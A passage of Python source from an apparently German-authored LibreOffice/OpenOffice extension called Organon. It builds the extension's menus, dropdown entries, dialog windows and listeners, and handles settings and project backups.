###### DEBUGGING ########\n global debug,log,load_reload\n debug = debugX\n log = logX\n \n self.debug = debugX\n if self.debug: \n self.time = time\n self.timer_start = self.time.clock()\n \n # Wird beim Debugging auf True gesetzt \n load_reload = sys.dont_write_bytecode\n \n if self.debug: log(inspect.stack)\n \n \n ###### DEBUGGING END ########\n \n \n \n self.win = win\n self.pd = pdk\n global pd,IMPORTS,LANG\n pd = pdk\n \n global T\n T = Tab()\n \n \n \n \n \n # Konstanten\n self.factory = factory\n self.dialog = dialog\n self.ctx = ctx\n self.smgr = self.ctx.ServiceManager\n self.toolkit = self.smgr.createInstanceWithContext(\"com.sun.star.awt.Toolkit\", ctx) \n self.topWindow = self.toolkit.getActiveTopWindow() \n self.desktop = self.smgr.createInstanceWithContext( \"com.sun.star.frame.Desktop\",self.ctx)\n self.doc = self.get_doc() \n self.current_Contr = self.doc.CurrentController \n self.programm = self.get_office_name() \n self.undo_mgr = self.doc.UndoManager\n self.viewcursor = self.current_Contr.ViewCursor\n self.tabsX = tabsX\n self.platform = sys.platform\n self.language = None\n LANG = self.lade_Modul_Language()\n self.path_to_extension = path_to_extension\n self.programm_version = self.get_programm_version()\n self.filters_import = None\n self.filters_export = None\n self.BEREICH_EINFUEGEN = self.get_BEREICH_EINFUEGEN()\n self.anleitung_geladen = False\n self.speicherort_last_proj = self.get_speicherort()\n self.projekt_name = None\n self.menu_start = menu_start\n self.sec_helfer = None\n \n \n \n # Properties\n self.props = {}\n self.props.update({T.AB :Props()})\n self.dict_sb = dict_sb # drei Unterdicts: sichtbare, eintraege, controls\n self.dict_sb_content = None\n \n self.tabs = {tabsX.ActiveTabID:(dialog,'Projekt')}\n self.active_tab_id = tabsX.ActiveTabID\n self.tab_id_old = self.active_tab_id\n self.registrierte_maus_listener = []\n self.maus_fenster = None\n self.mausrad_an = False\n self.texttools_geoeffnet = False\n \n # Settings\n self.settings_orga = settings_organon\n self.settings_exp = None\n self.settings_imp = None\n self.settings_proj = {}\n self.user_styles = ()\n \n # Pfade\n self.pfade = {}\n \n IMPORTS = {'uno':uno,\n 'unohelper':unohelper,\n 'sys':sys,\n 'os':os,\n 'ElementTree':ElementTree,\n 'time':time,\n 'codecs_open':codecs_open,\n 'math_floor':math_floor,\n 're':re,\n 'tb':tb,\n 'platform':platform,\n 'KONST':KONST,\n 'pd':pd,\n 'copy':copy,\n 'Props':Props,\n 'T':T,\n 'log':log,\n 'inspect':inspect,\n 'webbrowser':webbrowser,\n 'LANG':LANG}\n \n \n # Klassen \n self.Key_Handler = Key_Handler(self)\n self.ET = ElementTree \n self.nachricht = Mitteilungen(self.ctx,self).nachricht\n \n self.class_Baumansicht,self.class_Zeilen_Listener = self.get_Klasse_Baumansicht()\n self.class_Projekt = self.lade_modul('projects','Projekt') \n self.class_XML = self.lade_modul('xml_m','XML_Methoden')\n self.class_Funktionen = self.lade_modul('funktionen','Funktionen') \n self.class_Export = self.lade_modul('export','Export')\n self.class_Import = self.lade_modul('importX','ImportX') \n self.class_Sidebar = self.lade_modul('sidebar','Sidebar') \n self.class_Bereiche = self.lade_modul('bereiche','Bereiche')\n self.class_Version = self.lade_modul('version','Version') \n self.class_Tabs = self.lade_modul('tabs','Tabs') \n self.class_Latex = self.lade_modul('latex_export','ExportToLatex') \n self.class_Html = self.lade_modul('export2html','ExportToHtml') \n self.class_Zitate = self.lade_modul('zitate','Zitate') \n self.class_werkzeug_wListe= self.lade_modul('werkzeug_wListe','WListe') \n self.class_Index = self.lade_modul('index','Index')\n self.class_Mausrad = self.lade_modul('mausrad','Mausrad')\n self.class_Einstellungen = self.lade_modul('einstellungen','Einstellungen')\n self.class_Organon_Design = self.lade_modul('design','Organon_Design')\n self.class_Organizer = self.lade_modul('organizer','Organizer')\n \n # Plattformabhaengig\n if self.platform == 'win32':\n self.class_RawInputReader = self.lade_modul('rawinputdata','RawInputReader')\n \n self.class_Log = class_LogX\n self.class_Design = Design()\n self.class_Gliederung = Gliederung()\n \n #self.class_Greek = self.lade_modul('greek2latex','.Greek(self,pd)')\n \n # Listener \n self.VC_selection_listener = ViewCursor_Selection_Listener(self) \n self.w_listener = Dialog_Window_Listener(self) \n self.undo_mgr_listener = Undo_Manager_Listener(self)\n self.tab_listener = Tab_Listener(self)\n #self.listener_top_window = Top_Window_Listener(self)\n \n self.Listener = {}\n self.Listener.update( {'Menu_Leiste_Listener': Menu_Leiste_Listener(self)} )\n self.Listener.update( {'Menu_Leiste_Listener2': Menu_Leiste_Listener2(self)} )\n self.Listener.update( {'ScrollBar': ScrollBar_Listener} )\n \n self.undo_mgr.addUndoManagerListener(self.undo_mgr_listener)\n self.dialog.addWindowListener(self.w_listener)\n self.dialog.AccessibleContext.AccessibleParent.addEventListener(self.w_listener)\n self.tabsX.addTabListener(self.tab_listener)\n \n self.use_UM_Listener = False\n \n \n \n \n # UD_properties = self.doc.DocumentProperties.UserDefinedProperties\n\n\n except:\n logX(inspect.stack,tb())\n \n # fehlt:\n # Den User ueber den Fehler benachrichtigen\n \n \n \n def get_doc(self):\n if self.debug: log(inspect.stack)\n \n enum = self.desktop.Components.createEnumeration()\n comps = []\n \n while enum.hasMoreElements():\n comps.append(enum.nextElement())\n \n # Wenn ein neues Dokument geoeffnet wird, gibt es bei der Initialisierung\n # noch kein Fenster, aber die Komponente wird schon aufgefuehrt.\n # Hat die zuletzt erzeugte Komponente comps[0] kein ViewData,\n # dann wurde sie neu geoeffnet.\n if comps[0].ViewData == None:\n doc = comps[0]\n else:\n doc = self.desktop.getCurrentComponent() \n \n return doc\n \n def get_office_name(self):\n if self.debug: log(inspect.stack)\n \n frame = self.current_Contr.Frame\n if 'LibreOffice' in frame.Title:\n programm = 'LibreOffice'\n elif 'OpenOffice' in frame.Title:\n programm = 'OpenOffice'\n else:\n # Fuer Linux / OSX fehlt\n programm = 'LibreOffice'\n \n return programm\n \n def get_BEREICH_EINFUEGEN(self):\n if self.debug: log(inspect.stack)\n \n UM = self.doc.UndoManager\n newSection = self.doc.createInstance(\"com.sun.star.text.TextSection\")\n cur = self.doc.Text.createTextCursor() \n cur.gotoEnd(False)\n self.doc.Text.insertTextContent(cur, newSection, False)\n BEREICH_EINFUEGEN = UM.getCurrentUndoActionTitle()\n cur.gotoRange(newSection.Anchor,True)\n newSection.dispose()\n cur.setString('')\n return BEREICH_EINFUEGEN\n \n def get_programm_version(self):\n if self.debug: log(inspect.stack)\n \n pip = self.ctx.getByName(\"/singletons/com.sun.star.deployment.PackageInformationProvider\")\n for ext in pip.ExtensionList:\n if ext[0] == 'xaver.roemers.organon':\n version = ext[1]\n \n return version\n \n def erzeuge_Menu(self,win):\n if self.debug: log(inspect.stack)\n \n try: \n listener = Menu_Leiste_Listener(self) \n listener2 = Menu_Leiste_Listener2(self) \n \n # CONTAINER\n menuB_control, menuB_model = self.createControl(self.ctx, \"Container\", 2, 2, 1000, 20, (), ()) \n menuB_model.BackgroundColor = KONST.FARBE_MENU_HINTERGRUND\n \n win.addControl('Organon_Menu_Bar', menuB_control)\n \n bereich = self.props[T.AB].selektierte_zeile_alt\n \n Menueintraege = [\n (LANG.FILE,'a'),\n (LANG.BEARBEITEN_M,'a'),\n (LANG.ANSICHT,'a'), \n ('Ordner','b',KONST.IMG_ORDNER_NEU_24,LANG.INSERT_DIR),\n ('Datei','b',KONST.IMG_DATEI_NEU_24,LANG.INSERT_DOC),\n #('Speichern','b','vnd.sun.star.extension://xaver.roemers.organon/img/papierkorb_leeren.png',LANG.CLEAR_RECYCLE_BIN)\n ('Speichern','b','vnd.sun.star.extension://xaver.roemers.organon/img/lc_save.png',\n LANG.FORMATIERUNG_SPEICHERN.format(LANG.KEINE))\n ]\n \n x = 0\n \n # SPRACHE\n for eintrag in Menueintraege:\n if eintrag[1] == 'a':\n \n control, model = self.createControl(self.ctx, \"FixedText\", x, 2, 0, 20, (), ()) \n model.Label = eintrag[0] \n model.TextColor = KONST.FARBE_MENU_SCHRIFT\n control.addMouseListener(listener)\n breite = control.getPreferredSize().Width\n control.setPosSize(0,0,breite,0,4)\n \n menuB_control.addControl(eintrag[0], control)\n \n x += breite + 5\n \n x += 15\n\n # ICONS\n for eintrag in Menueintraege:\n if eintrag[1] == 'b': \n \n h = 0\n \n if T.AB != 'Projekt':\n if eintrag[0] in ('Ordner','Datei'):\n x += 22\n continue \n \n if eintrag[0] == 'Speichern':\n x += 20\n h = -2\n \n control, model = self.createControl(self.ctx, \"ImageControl\", x, 0 - h * .5, 20 + h, 20 + h, (), ()) \n model.ImageURL = eintrag[2]\n model.HelpText = eintrag[3]\n model.Border = 0 \n control.addMouseListener(listener2) \n \n menuB_control.addControl(eintrag[0], control) \n \n x += 22\n # TEST\n if load_reload:\n control, model = self.createControl(self.ctx, \"FixedText\", x+30, 2, 50, 20, (), ()) \n model.Label = 'Test' \n control.addMouseListener(listener)\n \n menuB_control.addControl('Test', control)\n\n except Exception as e:\n self.nachricht('erzeuge_Menu ' + str(e),\"warningbox\")\n log(inspect.stack,tb())\n\n \n def erzeuge_Menu_DropDown_Eintraege(self,items):\n if self.debug: log(inspect.stack)\n\n controls = []\n SEPs = []\n \n xBreite = 0\n y = 10\n \n listener = Auswahl_Menu_Eintrag_Listener(self)\n \n for item in items:\n \n if item != 'SEP':\n prop_names = ('Label',)\n prop_values = (item,)\n control, model = self.createControl(self.ctx, \"FixedText\", 30, y, 50,50, prop_names, prop_values)\n\n prefSize = control.getPreferredSize()\n \n Hoehe = prefSize.Height \n Breite = prefSize.Width + 10\n control.setPosSize(0,0,Breite ,Hoehe,12)\n \n control.addMouseListener(listener)\n \n if item == LANG.TEXTTOOLS:\n prop_names = ('ImageURL','Border')\n prop_values = ('vnd.sun.star.extension://xaver.roemers.organon/img/pfeil2.png',0)\n controlTexttools, modelT = self.createControl(self.ctx, \"ImageControl\", Breite , y+5, 4,6, prop_names, prop_values)\n controls.append(controlTexttools)\n \n if xBreite < Breite:\n xBreite = Breite\n \n y += Hoehe\n \n else:\n \n # Waagerechter Trenner\n control, model = self.createControl(self.ctx, \"FixedLine\", 30, y, 50,10,(),())\n model.TextColor = 0\n model.TextLineColor = 0\n SEPs.append(control)\n y += 10\n\n controls.append(control)\n \n \n # Senkrechter Trenner\n control, model = self.createControl(self.ctx, \"FixedLine\", 20, 10, 5,y -10 ,(),())\n controls.append(control)\n model.Orientation = 1\n\n for sep in SEPs:\n sep.setPosSize(0,0,xBreite ,0,4)\n \n try:\n controlTexttools.setPosSize(xBreite +30,0,0 ,0,1)\n except:\n pass\n \n return controls,listener,y - 5,xBreite +20\n\n\n def erzeuge_Menu_DropDown_Eintraege_Ansicht(self,items):\n if self.debug: log(inspect.stack)\n try:\n controls = []\n SEPs = []\n\n if self.projekt_name != None:\n tag1 = self.settings_proj['tag1']\n tag2 = self.settings_proj['tag2']\n tag3 = self.settings_proj['tag3']\n else:\n tag1 = 0\n tag2 = 0\n tag3 = 0\n \n xBreite = 0\n y = 10\n \n listener = Auswahl_Menu_Eintrag_Listener(self)\n tag_TV_listener = DropDown_Tags_TV_Listener(self)\n tag_SB_listener = DropDown_Tags_SB_Listener(self)\n \n\n for item in items:\n\n if item[0] != 'SEP':\n prop_names = ('Label',)\n prop_values = (item[0],)\n control, model = self.createControl(self.ctx, \"FixedText\", 30, y, 50,50, prop_names, prop_values)\n # Image\n control_I, model_I = self.createControl(self.ctx, \"ImageControl\", 5, y, 16,16, (), ())\n model_I.Border = 0\n \n prefSize = control.getPreferredSize()\n \n Hoehe = prefSize.Height \n Breite = prefSize.Width +15\n control.setPosSize(0,0,Breite ,Hoehe,12)\n \n if item[1] == 'Ueberschrift':\n model.FontWeight = 150\n \n \n elif item[1] == '' and item[0] != 'SEP':\n control.addMouseListener(listener)\n \n \n elif item[1] == 'Tag_TV':\n \n control.addMouseListener(tag_TV_listener)\n\n if self.projekt_name != None:\n sett = self.settings_proj\n tag1,tag2,tag3 = sett['tag1'],sett['tag2'],sett['tag3']\n else:\n tag1,tag2,tag3 = 0,0,0\n\n if item[0] == LANG.SHOW_TAG1 and tag1 == 1:\n model_I.ImageURL = 'private:graphicrepository/svx/res/apply.png'\n elif item[0] == LANG.SHOW_TAG2 and tag2 == 1:\n model_I.ImageURL = 'private:graphicrepository/svx/res/apply.png'\n elif item[0] == LANG.GLIEDERUNG and tag3 == 1:\n model_I.ImageURL = 'private:graphicrepository/svx/res/apply.png'\n \n \n elif item[1] == 'Tag_SB':\n \n control.addMouseListener(tag_SB_listener)\n \n panel = self.class_Sidebar.sb_panels2[item[0]]\n \n if panel in self.dict_sb['sichtbare']:\n model_I.ImageURL = 'private:graphicrepository/svx/res/apply.png' \n \n \n\n if xBreite < Breite:\n xBreite = Breite\n \n y += Hoehe\n \n else:\n \n # Waagerechter Trenner\n control, model = self.createControl(self.ctx, \"FixedLine\", 30, y, 50,10,(),())\n model.setPropertyValue('TextColor',102)\n model.setPropertyValue('TextLineColor',102)\n SEPs.append(control)\n y += 10\n\n controls.append((control,item[0]))\n controls.append((control_I,item[0]+'_icon'))\n \n # Senkrechter Trenner\n control, model = self.createControl(self.ctx, \"FixedLine\", 20, 10, 5,y -10 ,(),())\n controls.append((control,''))\n model.Orientation = 1\n \n for sep in SEPs:\n sep.setPosSize(0,0,xBreite ,0,4)\n \n return controls,listener,y - 5,xBreite +20\n except:\n log(inspect.stack,tb())\n \n \n def get_speicherort(self):\n if self.debug: log(inspect.stack)\n \n pfad = os.path.join(self.path_to_extension,'pfade.txt')\n \n if os.path.exists(pfad): \n with codecs_open( pfad, \"r\",\"utf-8\") as file:\n filepath = file.read() \n return filepath\n else:\n return None\n \n def get_Klasse_Baumansicht(self):\n if self.debug: log(inspect.stack)\n\n import baum \n \n for imp in IMPORTS:\n setattr(baum,imp,IMPORTS[imp])\n \n Klasse_Hauptfeld = baum.Baumansicht(self)\n Klasse_Zeilen_Listener = baum.Zeilen_Listener(self.ctx,self)\n return Klasse_Hauptfeld,Klasse_Zeilen_Listener\n\n def lade_modul(self,modul,arg = None): \n if self.debug: log(inspect.stack)\n \n try: \n# if load_reload:\n# load_reload_modul(modul,pyPath,self)\n \n mod = __import__(modul)\n \n for imp in IMPORTS:\n setattr(mod,imp,IMPORTS[imp])\n\n if arg == None:\n return mod\n else: \n oClass = getattr(mod, arg)\n return oClass(self)\n except:\n log(inspect.stack,tb())\n \n \n def lade_Modul_Language(self):\n if self.debug: log(inspect.stack)\n \n language = self.doc.CharLocale.Language\n \n if language not in ('de'):\n language = 'en'\n \n self.language = language\n \n try:\n lang = __import__('lang_'+language)\n except:\n lang = __import__('lang_en')\n\n return lang\n \n def lade_RawInputReader(self):\n if self.debug: log(inspect.stack)\n \n if self.platform != 'win32':\n return None\n \n import rawinputdata\n \n if load_reload:\n # reload laedt nur rawinputdata. Aenderungen in\n # RawInputReader werden nicht neu geladen.\n # \n # Die Methode lade_modul funktionierte ebenfalls nicht,\n # da bei erneutem Oeffnen von Organon die globalen Variablen\n # alle auf None gesetzt sind.\n #\n # Keine Idee fuer eine Loesung bis jetzt\n if self.programm == 'OpenOffice':\n reload(rawinputdata)\n \n return rawinputdata.RawInputReader\n \n \n def Test(self):\n try:\n self.class_Projekt.test()\n except:\n log(inspect.stack,tb())\n \n \n def leere_Papierkorb(self):\n if self.debug: log(inspect.stack)\n \n self.class_Baumansicht.leere_Papierkorb() \n \n def erzeuge_Backup(self):\n if self.debug: log(inspect.stack)\n \n try:\n pfad_zu_backup_ordner = os.path.join(self.pfade['projekt'],'Backups')\n if not os.path.exists(pfad_zu_backup_ordner):\n os.makedirs(pfad_zu_backup_ordner)\n \n lt = time.localtime()\n t = time.strftime(\" %d.%m.%Y %H.%M.%S\", lt)\n \n neuer_projekt_name = self.projekt_name + t\n pfad_zu_neuem_ordner = os.path.join(pfad_zu_backup_ordner,neuer_projekt_name)\n \n tree = copy.deepcopy(self.props['Projekt'].xml_tree)\n root = tree.getroot()\n \n all_elements = root.findall('.//')\n ordinale = []\n \n for el in all_elements:\n ordinale.append(el.tag) \n \n self.class_Export.kopiere_projekt(neuer_projekt_name,pfad_zu_neuem_ordner,\n ordinale,tree,self.dict_sb_content,True) \n os.rename(pfad_zu_neuem_ordner,pfad_zu_neuem_ordner+'.organon') \n self.nachricht('Backup erzeugt unter: %s' %pfad_zu_neuem_ordner+'.organon', \"infobox\") \n except:\n log(inspect.stack,tb())\n \n \n def debug_time(self):\n zeit = \"%0.2f\" %(self.time.clock()-self.timer_start)\n return zeit\n\n def entferne_alle_listener(self):\n if self.debug: log(inspect.stack)\n \n #return\n self.current_Contr.removeSelectionChangeListener(self.VC_selection_listener) \n self.current_Contr.removeKeyHandler(self.keyhandler)\n self.dialog.removeWindowListener(self.w_listener)\n self.undo_mgr.removeUndoManagerListener(self.undo_mgr_listener)\n \n# del(self.menu_start)\n# del(self)\n \n def erzeuge_Dialog_Container(self,posSize,Flags=1+32+64+128,parent=None):\n if self.debug: log(inspect.stack)\n \n ctx = self.ctx\n smgr = self.smgr\n \n X,Y,Width,Height = posSize\n \n if parent == None:\n parent = self.topWindow \n \n toolkit = smgr.createInstanceWithContext(\"com.sun.star.awt.Toolkit\", ctx) \n oCoreReflection = smgr.createInstanceWithContext(\"com.sun.star.reflection.CoreReflection\", ctx)\n \n # Create Uno Struct\n oXIdlClass = oCoreReflection.forName(\"com.sun.star.awt.WindowDescriptor\")\n oReturnValue, oWindowDesc = oXIdlClass.createObject(None)\n # global oWindow\n oWindowDesc.Type = uno.Enum(\"com.sun.star.awt.WindowClass\", \"TOP\")\n oWindowDesc.WindowServiceName = \"\"\n oWindowDesc.Parent = parent\n oWindowDesc.ParentIndex = -1\n oWindowDesc.WindowAttributes = Flags # Flags fuer com.sun.star.awt.WindowAttribute\n \n oXIdlClass = oCoreReflection.forName(\"com.sun.star.awt.Rectangle\")\n oReturnValue, oRect = oXIdlClass.createObject(None)\n oRect.X = X\n oRect.Y = Y\n oRect.Width = Width \n oRect.Height = Height \n \n oWindowDesc.Bounds = oRect\n \n # create window\n oWindow = toolkit.createWindow(oWindowDesc)\n \n # create frame for window\n oFrame = smgr.createInstanceWithContext(\"com.sun.star.frame.Frame\",ctx)\n oFrame.initialize(oWindow)\n oFrame.setCreator(self.desktop)\n oFrame.activate()\n oFrame.Name = 'Xaver' # no effect\n oFrame.Title = 'Xaver2' # no effect\n # create new control container\n cont = smgr.createInstanceWithContext(\"com.sun.star.awt.UnoControlContainer\", ctx)\n cont_model = smgr.createInstanceWithContext(\"com.sun.star.awt.UnoControlContainerModel\", ctx)\n cont_model.BackgroundColor = KONST.FARBE_ORGANON_FENSTER # 9225984\n #pd()\n #cont_model.ForegroundColor = KONST.FARBE_SCHRIFT_DATEI\n cont.setModel(cont_model)\n # need createPeer just only the container\n cont.createPeer(toolkit, oWindow)\n #cont.setPosSize(0, 0, 0, 0, 15)\n\n oFrame.setComponent(cont, None)\n cont.Model.Text = 'Gabriel' \n \n # PosSize muss erneut gesetzt werden, um die Anzeige zu erneuern,\n # sonst bleibt ein Teil des Fensters schwarz\n oWindow.setPosSize(0,0,Width,Height,12)\n \n return oWindow,cont\n \n \n def erzeuge_fensterinhalt(self,controls):\n # Controls und Models erzeugen\n pos_y = 0\n ctrls = {}\n \n pos_y_max = [0]\n \n for ctrl in controls:\n if isinstance(ctrl,int):\n pos_y += ctrl\n elif 'Y=' in ctrl:\n pos_y_max.append(pos_y)\n pos_y = int(ctrl.split('Y=')[1])\n else:\n name,unoCtrl,X,Y,width,height,prop_names,prop_values,extras = ctrl\n locals()[name],locals()[name.replace('control','model')] = self.createControl(self.ctx,unoCtrl,X,pos_y+Y,width,height,prop_names,prop_values)\n \n if 'calc' in name:\n w,h = self.kalkuliere_und_setze_Control(locals()[name],'w')\n \n \n if 'setActionCommand' in extras:\n locals()[name].setActionCommand(extras['setActionCommand'])\n if 'addItems' in extras:\n locals()[name].addItems(extras['addItems'],0)\n if 'Enable' in extras:\n locals()[name].Enable = extras['Enable']\n if 'addActionListener' in extras:\n for l in extras['addActionListener']:\n locals()[name].addActionListener(l)\n if 'addKeyListener' in extras:\n locals()[name].addKeyListener(extras['addKeyListener'])\n if 'addMouseListener' in extras:\n locals()[name].addMouseListener(extras['addMouseListener'])\n if 'addItemListener' in extras:\n locals()[name].addItemListener(extras['addItemListener']) \n if 'SelectedItems' in extras:\n locals()[name].Model.SelectedItems = extras['SelectedItems']\n \n ctrls.update({name:locals()[name]}) \n \n pos_y_max.append(pos_y)\n return ctrls,max(pos_y_max)\n \n def erzeuge_Scrollbar(self,fenster_cont,PosSize,control_innen):\n if self.debug: log(inspect.stack)\n \n PosX,PosY,Width,Height = PosSize\n Width = 20\n \n control, model = self.createControl(self.ctx,\"ScrollBar\",PosX,PosY,Width,Height,(),() ) \n model.Orientation = 1\n model.LiveScroll = True \n model.ScrollValueMax = control_innen.PosSize.Height/4 \n \n control.LineIncrement = fenster_cont.PosSize.Height/Height*50\n control.BlockIncrement = 200\n control.Maximum = control_innen.PosSize.Height \n control.VisibleSize = fenster_cont.PosSize.Height - 40 \n\n listener = self.Listener['ScrollBar'](self.debug,control_innen)\n control.addAdjustmentListener(listener) \n \n fenster_cont.addControl('ScrollBar',control) \n\n return control \n \n def loesche_undo_Aktionen(self):\n if self.debug: log(inspect.stack)\n \n undoMgr = self.doc.UndoManager\n undoMgr.reset()\n \n def speicher_settings(self,dateiname,eintraege):\n if self.debug: log(inspect.stack)\n \n path = os.path.join(self.pfade['settings'],dateiname)\n imp = pformat(eintraege)\n \n with open(path , \"w\") as file:\n file.write(imp)\n \n def tree_write(self,tree,pfad): \n if self.debug: log(inspect.stack) \n # diese Methode existiert, um alle Schreibvorgaenge\n # des XML_trees bei Bedarf kontrollieren zu koennen\n tree.write(pfad)\n \n def prettyprint(self,pfad,oObject,w=600):\n \n from pprint import pformat\n imp = pformat(oObject,width=w)\n with codecs_open(pfad , \"w\",'utf-8') as file:\n file.write(imp)\n \n\n def oeffne_dokument_in_neuem_fenster(self,URL):\n if self.debug: log(inspect.stack)\n \n self.new_doc = self.doc.CurrentController.Frame.loadComponentFromURL(URL,'_blank',0,())\n \n contWin = self.new_doc.CurrentController.Frame.ContainerWindow \n contWin.setPosSize(0,0,870,900,12)\n \n lmgr = self.new_doc.CurrentController.Frame.LayoutManager\n for elem in lmgr.Elements:\n \n if lmgr.isElementVisible(elem.ResourceURL):\n lmgr.hideElement(elem.ResourceURL)\n \n lmgr.HideCurrentUI = True \n \n viewSettings = self.new_doc.CurrentController.ViewSettings\n viewSettings.ZoomType = 3\n viewSettings.ZoomValue = 100\n viewSettings.ShowRulers = False\n \n def kalkuliere_und_setze_Control(self,ctrl,h_or_w = None):\n #if self.debug: log(inspect.stack)\n \n prefSize = ctrl.getPreferredSize()\n Hoehe = prefSize.Height \n Breite = prefSize.Width #+10\n \n if h_or_w == None:\n ctrl.setPosSize(0,0,Breite,Hoehe,12)\n elif h_or_w == 'h':\n ctrl.setPosSize(0,0,0,Hoehe,8)\n elif h_or_w == 'w':\n ctrl.setPosSize(0,0,Breite,0,4)\n \n return Breite,Hoehe\n \n \n # Handy function provided by hanya (from the OOo forums) to create a control, model.\n def createControl(self,ctx,type,x,y,width,height,names,values):\n try:\n #smgr = ctx.getServiceManager()\n ctrl = self.smgr.createInstanceWithContext(\"com.sun.star.awt.UnoControl%s\" % type,ctx)\n ctrl_model = self.smgr.createInstanceWithContext(\"com.sun.star.awt.UnoControl%sModel\" % type,ctx)\n ctrl_model.setPropertyValues(names,values)\n ctrl.setModel(ctrl_model)\n ctrl.setPosSize(x,y,width,height,15)\n return (ctrl, ctrl_model)\n except:\n log(inspect.stack,tb())\n \n \n def createUnoService(self,serviceName):\n sm = uno.getComponentContext().ServiceManager\n return sm.createInstanceWithContext(serviceName, uno.getComponentContext())\n \n def erzeuge_texttools_fenster(self,ev,m_win):\n \n loc_menu = ev.Source.Context.AccessibleContext.LocationOnScreen\n loc_cont = self.current_Contr.Frame.ContainerWindow.AccessibleContext.LocationOnScreen\n \n x3 = loc_menu.X - loc_cont.X # Position des Dropdown Menus\n y3 = loc_menu.Y - loc_cont.Y # Position des Dropdown Menus\n \n x3 += ev.Source.Context.PosSize.Width\n y3 += ev.Source.PosSize.Y\n \n items = menuEintraege(LANG,LANG.TEXTTOOLS)\n \n controls,listener,Hoehe,Breite = self.erzeuge_Menu_DropDown_Eintraege(items)\n controls = list((x,'') for x in controls)\n \n posSize = x3+2,y3,Breite +20,Hoehe +20\n win,cont = self.erzeuge_Dialog_Container(posSize,Flags=1+512)\n \n # Listener fuers Dispose des Fensters\n listener2 = Schliesse_Menu_Listener(self,texttools=True)\n cont.addMouseListener(listener2) \n listener2.ob = win\n \n listener.window = win\n listener.texttools = True\n #pd()\n listener.win2 = m_win\n \n for c in controls:\n cont.addControl(c[1],c[0])\n \n\n\nclass Props():\n def __init__(self):\n if debug: log(inspect.stack)\n \n self.dict_zeilen_posY = {}\n self.dict_ordner = {} # enthaelt alle Ordner und alle ihnen untergeordneten Zeilen\n self.dict_bereiche = {} # drei Unterdicts: Bereichsname,ordinal,Bereichsname-ordinal\n \n self.Hauptfeld = None # alle Zeilen, Controls\n self.sichtbare_bereiche = [] # Bereichsname ('OrganonSec'+ nr)\n self.kommender_Eintrag = 0\n self.selektierte_zeile = None # ordinal des Zeilencontainers\n self.selektierte_zeile_alt = None # control 'textfeld' der Zeile\n self.Papierkorb = None # ordinal des Papierkorbs - wird anfangs einmal gesetzt und bleibt konstant \n self.Projektordner = None # ordinal des Projektordners - wird anfangs einmal gesetzt und bleibt konstant \n self.Papierkorb_geleert = False\n self.tastatureingabe = False\n self.zuletzt_gedrueckte_taste = None\n\n self.xml_tree = None\n \n self.tab_auswahl = Tab_Auswahl()\n \n\ndef menuEintraege(LANG,menu):\n \n if menu == LANG.FILE:\n \n items = (LANG.NEW_PROJECT, \n LANG.OPEN_PROJECT ,\n 'SEP', \n LANG.NEW_DOC, \n LANG.NEW_DIR,\n 'SEP',\n LANG.EXPORT_2, \n LANG.IMPORT_2,\n 'SEP',\n LANG.BACKUP,\n LANG.EINSTELLUNGEN)\n \n if T.AB != 'Projekt':\n items = (\n LANG.EXPORT_2, \n 'SEP',\n LANG.BACKUP,\n LANG.EINSTELLUNGEN)\n \n elif menu == LANG.BEARBEITEN_M:\n items = ( \n LANG.ORGANIZER,\n LANG.NEUER_TAB,\n 'SEP',\n LANG.TRENNE_TEXT,\n LANG.TEXTTOOLS,\n 'SEP',\n LANG.UNFOLD_PROJ_DIR,\n LANG.CLEAR_RECYCLE_BIN\n )\n if T.AB != 'Projekt':\n items = ( \n LANG.ORGANIZER,\n 'SEP',\n LANG.NEUER_TAB,\n LANG.SCHLIESSE_TAB,\n LANG.IMPORTIERE_IN_TAB,\n 'SEP',\n #LANG.TEXTVERGLEICH,\n #LANG.WOERTERLISTE,\n LANG.TEXTTOOLS,\n 'SEP',\n LANG.UNFOLD_PROJ_DIR,\n LANG.CLEAR_RECYCLE_BIN\n ) \n \n elif menu == LANG.ANSICHT:\n items = ((LANG.SICHTBARE_TAGS_BAUMANSICHT,'Ueberschrift'),\n (LANG.SHOW_TAG1,'Tag_TV'),\n (LANG.SHOW_TAG2,'Tag_TV'),\n (LANG.GLIEDERUNG,'Tag_TV'),\n ('SEP',''),\n (LANG.SICHTBARE_TAGS_SEITENLEISTE,'Ueberschrift'),\n (LANG.SYNOPSIS,'Tag_SB'),\n (LANG.NOTIZEN,'Tag_SB'),\n (LANG.BILDER,'Tag_SB'),\n (LANG.ALLGEMEIN,'Tag_SB'),\n (LANG.CHARAKTERE,'Tag_SB'),\n (LANG.ORTE,'Tag_SB'),\n (LANG.OBJEKTE,'Tag_SB'),\n (LANG.ZEIT,'Tag_SB'),\n (LANG.BENUTZER1,'Tag_SB'),\n (LANG.BENUTZER2,'Tag_SB'),\n (LANG.BENUTZER3,'Tag_SB'),\n ('SEP',''),\n (LANG.ZEIGE_TEXTBEREICHE,''),\n ('SEP',''),\n (LANG.HOMEPAGE,''),\n (LANG.FEEDBACK,''),\n )\n \n elif menu == LANG.TEXTTOOLS:\n items = (LANG.TEXTVERGLEICH,\n LANG.WOERTERLISTE,\n LANG.ERZEUGE_INDEX\n )\n \n return items\n\n\nclass Tab_Auswahl():\n def __init__(self):\n if debug: log(inspect.stack)\n \n self.rb = None\n self.eigene_auswahl = None\n self.eigene_auswahl_use = None\n \n self.seitenleiste_use = None\n self.seitenleiste_log = None\n self.seitenleiste_log_tags = None\n self.seitenleiste_tags = None\n \n self.baumansicht_use = None\n self.baumansicht_log = None\n self.baumansicht_tags = None\n \n self.suche_use = None\n self.suche_log = None\n self.suche_term = None\n \n self.behalte_hierarchie_bei = None\n self.tab_name = None\n \n \n \n\nclass Tab ():\n def __init__(self):\n if debug: log(inspect.stack)\n self.AB = 'Projekt'\n \n\nclass Design():\n \n def __init__(self):\n if debug: log(inspect.stack)\n \n self.default_tab = {}\n self.custom_tab = {}\n self.tabs = {}\n self.new_tabs = {}\n \n \n def set_default(self,tabs):\n if debug: log(inspect.stack)\n \n summe = 0\n i = 0\n for tab in tabs:\n self.default_tab.update({'tab%sx'%(i):tab})\n self.custom_tab.update({'tab%sx'%(i):0})\n \n summe = 0\n for j in range(i+1):\n summe += self.default_tab['tab%sx'%(j)]\n \n self.tabs.update({'tab%sx'%(i):summe})\n\n i += 1\n \n \n def setze_tab(self,tab_name,value): \n \n for x in tab_name:\n if x.isdigit():\n break\n \n x = int(x)\n \n if self.custom_tab['tab%sx'%(x+1)] < value:\n if value > self.default_tab['tab%sx'%(x+1)]:\n self.custom_tab['tab%sx'%(x+1)] = value\n \n \n def kalkuliere_tabs(self):\n if debug: log(inspect.stack)\n \n self.new_tabs = {}\n \n for i 